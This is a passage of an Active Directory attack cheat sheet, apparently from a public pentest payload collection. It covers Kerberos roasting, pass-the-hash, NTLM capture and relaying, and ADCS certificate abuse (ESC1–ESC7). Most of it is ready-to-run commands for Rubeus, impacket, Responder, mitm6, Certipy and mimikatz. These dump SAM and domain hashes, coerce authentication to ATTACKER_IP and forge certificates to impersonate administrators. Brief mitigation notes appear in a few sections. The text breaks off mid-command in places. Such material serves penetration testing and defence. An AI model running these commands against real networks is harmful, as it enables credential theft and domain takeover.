$krb5asrep$23$john.doe@LAB.LOCAL:5d1f750[...]2a6270d7$096fc87726c64e545acd4687faf780[...]13ea567d5 + ``` + +Using `hashcat` or `john` to crack the ticket. + +```powershell +# crack AS_REP messages with hashcat +root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt +root@windows:hashcat$ hashcat64.exe -m 18200 '' -a 0 c:\wordlists\rockyou.txt + +# crack AS_REP messages with john +C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproast +``` + +**Mitigations**: +* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). + + +## Kerberoasting w/o domain account + +> In September 2022 a vulnerability was discovered by [Charlie Clark](https://exploit.ph/), ST (Service Tickets) can be obtained through KRB_AS_REQ request without having to control any Active Directory account. If a principal can authenticate without pre-authentication (like AS-REP Roasting attack), it is possible to use it to launch an **KRB_AS_REQ** request and trick the request to ask for a **ST** instead of a **encrypted TGT**, by modifying the **sname** attribute in the req-body part of the request. + +The technique is fully explained in this article: [Semperis blog post](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/). + +:warning: You must provide a list of users because we don't have a valid account to query the LDAP using this technique. + +* [impacket/GetUserSPNs.py from PR #1413](https://github.com/fortra/impacket/pull/1413) + ```powershell + GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/ + ``` +* [GhostPack/Rubeus from PR #139](https://github.com/GhostPack/Rubeus/pull/139) + ```powershell + Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE" + ``` + + +## CVE-2022-33679 + +> CVE-2022-33679 performs an encryption downgrade attack by forcing the KDC to use the RC4-MD4 algorithm and then brute forcing the session key from the AS-REP using a known plaintext attack, Similar to AS-REP Roasting, it works against accounts that have pre-authentication disabled and the attack is unauthenticated meaning we don’t need a client’s password.. + +Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html + +**Requirements**: +- Accounts with the attribute **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`) + +* using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679) + ```bash + user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL + user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache + user@hostname:~$ crackmapexec smb DC01.DOMAIN.LOCAL -k --shares + ``` + +**Mitigations**: +* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). +* Disable RC4 cipher if possible. + + +## Timeroasting + +> Timeroasting takes advantage of Windows' NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer account by sending an NTP request with that account's RID + +* [SecuraBV/Timeroast](https://github.com/SecuraBV/Timeroast) - Timeroasting scripts by Tom Tervoort + ```ps1 + sudo ./timeroast.py 10.0.0.42 | tee ntp-hashes.txt + hashcat -m 31300 ntp-hashes.txt + ``` + + +## Pass-the-Hash + +The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. + +* Metasploit + ```powershell + use exploit/windows/smb/psexec + set RHOST 10.2.0.3 + set SMBUser jarrieta + set SMBPass nastyCutt3r + # NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack. + # NOTE2: Require the full NT hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) + set PAYLOAD windows/meterpreter/bind_tcp + run + shell + ``` +* CrackMapExec + ```powershell + cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" + ``` +* Impacket suite + ```powershell + proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d + ``` +* Windows RDP and mimikatz + ```powershell + sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863 + sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin" + ``` + +You can extract the local **SAM database** to find the local administrator hash : + +```powershell +C:\> reg.exe save hklm\sam c:\temp\sam.save +C:\> reg.exe save hklm\security c:\temp\security.save +C:\> reg.exe save hklm\system c:\temp\system.save +$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL +``` + + +## OverPass-the-Hash (pass the key) + +In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT). + +### Using impacket + +```bash +root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ropnop.com +root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache" +root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass + +# also with the AES Key if you have it +root@kali:~$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com + +root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5 +root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM +root@kali:~$ klist +``` + +### Using Rubeus + +```powershell +# Request a TGT as the target user and pass it into the current session +# NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs +.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt + +# More stealthy variant, but requires the AES256 hash +.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256HASH] /opsec /ptt + +# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation) +.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe +``` + + +## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens + +> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication (they are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys. + +:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes. + +**Requirements**: +* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`) + +**Exploitation**: +* Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge + ```ps1 + HTTPS = On + DNS = On + LDAP = On + ... + ; Custom challenge. + ; Use "Random" for generating a random challenge for each requests (Default) + Challenge = 1122334455667788 + ``` +* Fire Responder: `responder -I eth0 --lm`, if `--disable-ess` is set, extended session security will be disabled for NTLMv1 authentication +* Force a callback: + ```ps1 + PetitPotam.exe Responder-IP DC-IP # Patched around August 2021 + PetitPotam.py -u Username -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP # Not patched for authenticated users + ``` +* If you got some `NetNTLMv1 tokens`, you can try to **shuck** them online via [Shuck.Sh](https://shuck.sh/) or locally/on-premise via [ShuckNT](https://github.com/yanncam/ShuckNT/) to get NT-hashes corresponding from [HIBP database](https://haveibeenpwned.com/Passwords). If the NT-hash has previously leaked, the NetNTLMv1 is converted to NT-hash ([pass-the-hash](#pass-the-hash) ready) instantly. The [shucking process](https://www.youtube.com/watch?v=OQD3qDYMyYQ&ab_channel=PasswordVillage) works for any NetNTLMv1 with or without ESS/SSP (challenge != `1122334455667788`) but mainly for user account (plaintext previsouly leaked). + ```ps1 + # Submit NetNTLMv1 online to https://shuck.sh/get-shucking.php + # Or shuck them on-premise via ShuckNT script: + $ php shucknt.php -f tokens-samples.txt -w pwned-passwords-ntlm-reversed-ordered-by-hash-v8.bin + [...] + 10 hashes-challenges analyzed in 3 seconds, with 8 NT-Hash instantly broken for pass-the-hash and 1 that can be broken via crack.sh for free. + [INPUT] ycam::ad:DEADC0DEDEADC0DE00000000000000000000000000000000:70C249F75FB6D2C0AC2C2D3808386CCAB1514A2095C582ED:1122334455667788 + [NTHASH-SHUCKED] 93B3C62269D55DB9CA660BBB91E2BD0B + ``` +* If you got some `NetNTLMv1 tokens`, you can also try to crack them via [Crack.Sh](https://crack.sh/) (cloud service when available, more time and potentially chargeable). For this you need to format them to submit them on [Crack.Sh](https://crack.sh/netntlm/). The Converter of [Shuck.Sh](https://shuck.sh/) can be used to convert format easily. + ```ps1 + # When there is no-ESS/SSP and the challenge is set to 1122334455667788, it's free (0$): + username::hostname:response:response:challenge -> NTHASH:response + NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972 + + # When there is ESS/SSP or challenge != 1122334455667788, it's chargeable from $20-$200: + username::hostname:lmresponse+0padding:ntresponse:challenge -> $NETNTLM$challenge$ntresponse + $NETNTLM$DEADC0DEDEADC0DE$507E2A2131F4AF4A299D8845DE296F122CA076D49A80476E + ``` +* Finaly, if no [Shuck.Sh](https://shuck.sh/) nor [Crack.Sh](https://crack.sh/) can be used, you can try to break NetNTLMv1 with Hashcat / John The Ripper + ```ps1 + john --format=netntlm hash.txt + hashcat -m 5500 -a 3 hash.txt # for NetNTLMv1(-ESS/SSP) to plaintext (for user account) + hashcat -m 27000 -a 0 hash.txt nthash-wordlist.txt # for NetNTLMv1(-ESS/SSP) to NT-hash (for user and computer account, depending on nthash-wordlist quality) + hashcat -m 14000 -a 3 inputs.txt --hex-charset -1 /usr/share/hashcat/charsets/DES_full.hcchr ?1?1?1?1?1?1?1?1 # for NetNTLMv1(-ESS/SSP) to DES-keys (KPA-attack) of user/computer account with 100% success rate, then regenerate NT-hash with these DES-keys on https://shuck.sh/converter.php. + ``` +* Now you can DCSync using the Pass-The-Hash with the DC machine account + +:warning: NetNTLMv1 with ESS / SSP (Extended Session Security / Security Support Provider) changes the final challenge by adding a new alea (!= `1122334455667788`, so chargeable on [Crack.Sh](https://crack.sh/)). + +:warning: NetNTLMv1 format is `login::domain:lmresp:ntresp:clientChall`. If the `lmresp` contains a **0's-padding** this means that the token is protected by **ESS/SSP**. + +:warning: NetNTLMv1 final challenge is the Responder's challenge itself (`1122334455667788`) when there is no ESS/SSP. If ESS/SSP is enabled, the final challenge is the first 8 bytes of the MD5 hash from the concatenation of the client challenge and server challenge. The details of the algorithmic generation of a NetNTLMv1 are illustrated on the [Shuck.Sh Generator](https://shuck.sh/generator.php) and detailed in [MISCMag#128](https://connect.ed-diamond.com/misc/misc-128/shuck-hash-before-trying-to-crack-it). + +:warning: If you get some tokens from other tools ([hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) or [chapcrack](https://github.com/moxie0/chapcrack)) in other formats, like tokens starting with the prefix `$MSCHAPv2$`, `$NETNTLM$` or `$99$`, they correspond to a classic NetNTLMv1 and can be converted from one format to another [here](https://shuck.sh/converter.php). + + +**Mitigations**: + +* Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM` + +## Capturing and cracking Net-NTLMv2/NTLMv2 hashes + +If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. + +```powershell +# https://github.com/lgandx/Responder +$ sudo ./Responder.py -I eth0 -wfrd -P -v + +# https://github.com/Kevin-Robertson/InveighZero +PS > .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y -DHCPv6 Y -LLMNRv6 Y [-Elevated N] + +# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Invoke-Inveigh.ps1 +PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y –mDNS Y –Proxy Y -MachineAccounts Y +``` + +Crack the hashes with Hashcat / John The Ripper + +```ps1 +john --format=netntlmv2 hash.txt +hashcat -m 5600 -a 3 hash.txt +``` + + +## Man-in-the-Middle attacks & relaying + +NTLMv1 and NTLMv2 can be relayed to connect to another machine. + +| Hash | Hashcat | Attack method | +|---|---|---| +| LM | `3000` | crack/pass the hash | +| NTLM/NTHash | `1000` | crack/pass the hash | +| NTLMv1/Net-NTLMv1 | `5500` | crack/relay attack | +| NTLMv2/Net-NTLMv2 | `5600` | crack/relay attack | + +Crack the hash with `hashcat`. + +```powershell +hashcat -m 5600 -a 0 hash.txt crackstation.txt +``` + +### MS08-068 NTLM reflection + +NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008. + +> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials. + +* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068 + +```powershell +msf > use exploit/windows/smb/smb_relay +msf exploit(smb_relay) > show targets +``` + +### LDAP signing not required and LDAP channel binding disabled + +During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed: +* LDAP signing not required (by default set to `Not required`) +* LDAP channel binding is disabled. (by default disabled) +* `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default) + +Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer. +```bash +# On first terminal +sudo ./Responder.py -I eth0 -wfrd -P -v + +# On second terminal +sudo python ./ntlmrelayx.py -t ldaps://IP_DC --add-computer +``` +It is required here to relay to LDAP over TLS because creating accounts is not allowed over an unencrypted connection. + +### SMB Signing Disabled and IPv4 + +If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. Also called **LLMNR/NBNS Poisoning** + +1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`. + ```powershell + [Responder Core] + ; Servers to start + ... + SMB = Off # Turn this off + HTTP = Off # Turn this off + ``` +2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`. +3. Run `python Responder.py -I ` +4. Use a relay tool such as `ntlmrelayx` or `MultiRelay` + - `impacket-ntlmrelayx -tf targets.txt` to dump the SAM database of the targets in the list. + - `python MultiRelay.py -t -u ALL` +5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions. + ```powershell + $ impacket-ntlmrelayx -tf /tmp/targets.txt -socks -smb2support + [*] Servers started, waiting for connections + Type help for list of commands + ntlmrelayx> socks + Protocol Target Username Port + -------- -------------- ------------------------ ---- + MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 + SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 + MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 + + # You might need to select a target with "-t" + # smb://, mssql://, http://, https://, imap://, imaps://, ldap://, ldaps:// and smtp:// + impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support + impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support + + # the socks proxy can then be used with your Impacket tools or CrackMapExec + $ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1 + $ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth + $ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1" + ``` + +**Mitigations**: + + * Disable LLMNR via group policy + ```powershell + Open gpedit.msc and navigate to Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution and set to Enabled + ``` + * Disable NBT-NS + ```powershell + This can be achieved by navigating through the GUI to Network card > Properties > IPv4 > Advanced > WINS and then under "NetBIOS setting" select Disable NetBIOS over TCP/IP + ``` + +### SMB Signing Disabled and IPv6 + +Since [MS16-077](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077) the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS. + +```powershell +crackmapexec smb $hosts --gen-relay-list relay.txt + +# DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6 +# -d is the domain name that we filter our request on - the attacked domain +# -i is the interface we have mitm6 listen on for events +mitm6 -i eth0 -d $domain + +# spoofing WPAD and relaying NTLM credentials +impacket-ntlmrelayx -6 -wh $attacker_ip -of loot -tf relay.txt +impacket-ntlmrelayx -6 -wh $attacker_ip -l /tmp -socks -debug + +# -ip is the interface you want the relay to run on +# -wh is for WPAD host, specifying your wpad file to serve +# -t is the target where you want to relay to. +impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2 +``` + +### Drop the MIC + +> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP + +Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner) + +```powershell +python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' +[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth +[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected) +``` + +- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD + ```powershell + TERM1> python printerbug.py testsegment.local/username@s2012exc.testsegment.local + TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support + TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc + ``` + + +- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server. + ```powershell + # create a new machine account + TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support + TERM2> python printerbug.py relaytest.local/username@second-dc-server 10.0.2.6 + TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME + + # connect using the ticket + export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache + secretsdump.py -k -no-pass second-dc-server.local -just-dc + ``` + +### Ghost Potato - CVE-2019-1384 + +Requirements: +* User must be a member of the local Administrators group +* User must be a member of the Backup Operators group +* Token must be elevated + +Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impacket-ghostpotato.zip + +```powershell +ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe +``` + +### RemotePotato0 DCOM DCE RPC relay + +> It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine + +Requirements: +- a shell in session 0 (e.g. WinRm shell or SSH shell) +- a privileged user is logged on in the session 1 (e.g. a Domain Admin user) + +```powershell +# https://github.com/antonioCoco/RemotePotato0/ +Terminal> sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 & # Can be omitted for Windows Server <= 2016 +Terminal> sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1 +Session0> RemotePotato0.exe -r 192.168.83.130 -p 9998 -s 2 +Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135' +``` + + +### DNS Poisonning - Relay delegation with mitm6 + +Requirements: +- IPv6 enabled (Windows prefers IPV6 over IPv4) +- LDAP over TLS (LDAPS) + +> ntlmrelayx relays the captured credentials to LDAP on the domain controller, uses that to create a new machine account, print the account's name and password and modifies the delegation rights of it. + +```powershell +git clone https://github.com/fox-it/mitm6.git +cd /opt/tools/mitm6 +pip install . + +mitm6 -hw ws02 -d lab.local --ignore-nofqnd +# -d: the domain name that we filter our request on (the attacked domain) +# -i: the interface we have mitm6 listen on for events +# -hw: host whitelist + +ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad +ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad --add-computer +# -ip: the interface you want the relay to run on +# -wh: WPAD host, specifying your wpad file to serve +# -t: the target where you want to relay to + +# now granting delegation rights and then do a RBCD +ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad +getST.py -spn cifs/target.lab.local lab.local/GENERATED\$ -impersonate Administrator +export KRB5CCNAME=administrator.ccache +secretsdump.py -k -no-pass target.lab.local +``` + +### Relaying with WebDav Trick + +> Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB + +**Requirement**: +* WebClient service + +**Exploitation**: +* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf` +* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0 +* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support` +* Discover WebDAV services + ```ps1 + webclientservicescanner 'domain.local'/'user':'password'@'machine' + crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav + GetWebDAVStatus.exe 'machine' + ``` +* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. + ```ps1 + # PrinterBug + dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + SpoolSample.exe "ATTACKER_IP" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" + + # PetitPotam + Petitpotam.py "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" + ``` +* Use the created account to ask for a service ticket: + ```ps1 + .\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l +pyrdp-mitp.py : # with custom port +pyrdp-mitm.py -k private_key.pem -c certificate.pem # with custom key and certificate +``` +* Exploitation + * If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge + * If NLA is disabled, you will obtain the password in plaintext + * Other features are available such as keystroke recording +* Alternatives + * S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener + +## Active Directory Certificate Services + +* Find ADCS Server + * `crackmapexec ldap domain.lab -u username -p password -M adcs` + * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=,OU=Users,DC=domain,DC=local' -w '' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` +* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump` + +### ESC1 - Misconfigured Certificate Templates + +> Domain Users can enroll in the **VulnTemplate** template, which can be used for client authentication and has **ENROLLEE_SUPPLIES_SUBJECT** set. This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA). Allows additional identities to be bound to a certificate beyond the Subject. + +**Requirements** + +* Template that allows for AD authentication +* **ENROLLEE_SUPPLIES_SUBJECT** flag +* [PKINIT] Client Authentication, Smart Card Logon, Any Purpose, or No EKU (Extended/Enhanced Key Usage) + + +**Exploitation** + +* Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates + ```ps1 + Certify.exe find /vulnerable + Certify.exe find /vulnerable /currentuser + # or + PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local' + # or + certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound + ``` +* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate) + ```ps1 + # request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt. + Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin + certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN + certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local' + ``` +* Use OpenSSL and convert the certificate, do not enter a password + ```ps1 + openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx + ``` +* Move the cert.pfx to the target machine filesystem and request a TGT for the altname user using Rubeus + ```ps1 + Rubeus.exe asktgt /user:domadmin /certificate:C:\Temp\cert.pfx + ``` + +**WARNING**: These certificates will still be usable even if the user or computer resets their password! + +**NOTE**: Look for **EDITF_ATTRIBUTESUBJECTALTNAME2**, **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**, **ManageCA** flags, and NTLM Relay to AD CS HTTP Endpoints. + + +### ESC2 - Misconfigured Certificate Templates + +**Requirements** + +* Allows requesters to specify a Subject Alternative Name (SAN) in the CSR as well as allows Any Purpose EKU (2.5.29.37.0) + +**Exploitation** + +* Find template + ```ps1 + PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local' + ``` +* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates). + + +### ESC3 - Misconfigured Enrollment Agent Templates + +> ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users + +* Request a certificate based on the vulnerable certificate template ESC3. + ```ps1 + $ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC3' + [*] Saved certificate and private key to 'john.pfx' + ``` +* Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user + ```ps1 + $ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx' + ``` + + +### ESC4 - Access Control Vulnerabilities + +> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability + +* Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) + ```ps1 + python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl + ``` +* Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1 + ```ps1 + python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag + + # Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template. + C:\>StandIn.exe --adcs --filter WebServer --ess --add + ``` +* Perform ESC1 and then restore the value + ```ps1 + python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag + ``` + +Using Certipy + +```ps1 +# overwrite the configuration to make it vulnerable to ESC1 +certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old +# request a certificate based on the ESC4 template, just like ESC1. +certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC4' -alt 'administrator@corp.local' +# restore the old configuration +certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json +``` + +### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 + +> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name. + +**Exploitation** + +* Use [Certify.exe](https://github.com/GhostPack/Certify) to check for **UserSpecifiedSAN** flag state which refers to the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag. + ```ps1 + Certify.exe cas + ``` +* Request a certificate for a template and add an altname, even though the default `User` template doesn't normally allow to specify alternative names + ```ps1 + .\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin + ``` + +**Mitigation** + +* Remove the flag: `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2` + + +### ESC7 - Vulnerable Certificate Authority Access Control + +**Exploitation** + +* Detect CAs that allow low privileged users the `ManageCA` or `Manage Certificates` permissions + ```ps1 + Certify.exe find /vulnerable + ``` +* Change the CA settings to enable the SAN extension for all the templates under the vulnerable CA (ESC6) + ```ps1 + Certify.exe setconfig /enablesan /restart + ``` +* Request the certificate with the desired SAN. + ```ps1 + Certify.exe request /template:User 